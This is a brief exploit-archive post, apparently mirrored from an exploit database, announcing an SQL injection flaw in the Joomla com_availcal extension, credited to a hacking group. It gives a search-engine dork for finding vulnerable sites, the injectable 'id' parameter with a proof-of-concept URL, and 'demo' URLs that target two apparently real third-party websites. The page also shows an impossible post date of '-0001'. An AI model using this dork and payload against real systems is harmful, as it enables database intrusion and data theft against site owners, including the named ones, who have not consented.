Home / os / palm

Joomla com_availcal - SQL Injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla com_availcal - SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Joomla com_availcal - SQL Injection # Exploit Author : Persian Hack Team # Dork : inurl:index.php?option=com_availcal # Vendor Homepage : https://github.com/lorelay90210/jpm-joomla-extensions/tree/master/availcal/availcal # Category: [ Webapps ] # Tested on: [ Win ] # Version: 05 # Date: 2016/06/08 ###################### # # PoC: # id parameter vulnerable to SQL # http://www.site.com/index.php?option=com_availcal&format=update&id=[SQL] # Demo : # http://www.vvfpn.it/index.php?option=com_availcal&format=update&id=%27 # http://www.dpsgwegberg.de/index.php?option=com_availcal&format=update&id=%27 # Youtube : https://www.youtube.com/watch?v=TVCPPRoBIm8 ###################### # Discovered by : Mojtaba MobhaM & T3NZOG4N & FireKernel # Greetz : Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : persian-team.ir ######################</BODY></HTML>

 

TOP